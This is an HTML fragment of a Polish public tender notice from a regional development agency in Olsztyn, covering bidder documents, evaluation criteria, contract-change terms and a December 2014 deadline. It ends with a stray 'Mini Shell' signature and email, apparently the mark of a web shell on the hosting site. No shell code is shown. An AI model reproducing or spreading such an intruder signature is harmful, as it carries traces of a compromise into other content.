<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	FORMULARZ OFERTOWY  wg wzoru stanowiącego załączniki do SIWZ. 
2)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą ustanowić Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
3)	Oświadczenie o braku powiązań kapitałowych i osobowych z Zamawiającym
Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie innych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
Jeżeli Wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 PZP, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b PZP, a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający żąda od Wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentów, o których mowa w pkt 9.1 (tabela) Lp. 2 ppkt od 2 do 6 (z wyłączeniem oświadczenia o spełnianiu warunków udziału w postępowaniu). Ponadto, w celu oceny, czy Wykonawca będzie dys-ponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do tych zasobów, Zamawiający żąda przedstawienia w ofercie doku-mentów dotyczących w szczególności:
e)	zakresu dostępnych Wykonawcy zasobów innego podmiotu;
f)	sposobu wykorzystania zasobów innego podmiotu przez Wykonawcę przy wyko-nywaniu zamówienia;
g)	charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem;
h)	zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - doświadczenie w zakresie realizacji usług hotelowych wraz z wynajmem sal konferencyjnych/szkoleniowych oraz cateringiem - 20</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania następujących istotnych zmian w zawartej umowie w sprawie niniejszego zamówienia publicznego, określając jednocześnie warunki ich wprowadzenia:
1. zmiany miejsca szkolenia i liczby uczestników szkoleń wg wcześniejszych ustaleń mai-lowych,
2. zmiany ilości grup szkoleniowych i wystąpienia konieczności ograniczenia zakresu rze-czowego przedmiotu zamówienia,
3. zmiany terminu szkolenia na skutek odwołania zajęć przez Kierownika projektu wg wcześniejszych ustaleń mailowych,
4. wydłużenia okresu realizacji umowy na skutek okoliczności, których strony nie mogły przewidzieć w chwili jej zawarcia (np. zmian w harmonogramie realizacji projektu).
5. Zmianie mogą ulec terminy realizacji przedmiotu umowy, o których mowa w § 7 Umowy w przypadku:
a)	wystąpienia konieczności ograniczenia zakresu rzeczowego przedmiotu zamówienia,
b)	wcześniejsze zrealizowanie przedmiotu umowy przez Wykonawcę,
c)	przedłużenie z tytułu nieprzewidzianych sytuacji
6. Zamawiający dopuszcza zmianę postanowień zawartej umowy w przypadku ustawowej zmiany wysokości podatku VAT,
7. Przewiduje się możliwość ograniczenia zakresu rzeczowego przedmiotu zamówienia w sytuacji nie wykorzystania pełnego zakresu ilościowego umowy w przypadku zre-krutowania mniejszej ilości uczestników - zgodnie z zapisami istotnych warunków umów. Płatność w takim przypadku, dokonywana będzie na podstawie faktycznie przeprowadzonego i zatwierdzonego przez Zamawiającego szkolenia. Sytuacja ta nie może być podstawą do roszczenia Wykonawcy o zakup niezrealizowanej części umowy, ani do dochodzenia jakichkolwiek innych roszczeń z tego tytułu.
8. Zmiana przepisów prawa powszechnie obowiązującego bądź zasad realizacji projektów w ramach Programu Operacyjnego Kapitał Ludzki.
9. Każda zmiana postanowień niniejszej Umowy wymaga formy pisemnej w postaci anek-su, pod rygorem nieważności.
10. W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach. W takim wypadku Wykonawca może żądać wy-łącznie wynagrodzenia należnego mu z tytułu wykonania części umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wmarr.olsztyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Warmińsko-Mazurska Agencja Rozwoju Regionalnego S.A. w Olsztynie Plac Gen. Józefa Bema 3 10-516 Olsztyn.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.12.2014 godzina 10:00, miejsce: Warmińsko-Mazurska Agencja Rozwoju Regionalnego S.A. w Olsztynie Plac Gen. Józefa Bema 3 10-516 Olsztyn.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Ekologiczny biznes to dobry biznes współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego. Umowa o dofinansowanie projektu nr: UDA-POKL.02.01.01-00-311/13-1 z dnia 17.02.2014. Zamówienie jest finansowane w 100% w ramach Europejskiego Funduszu Społecznego oraz budżetu państwa.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com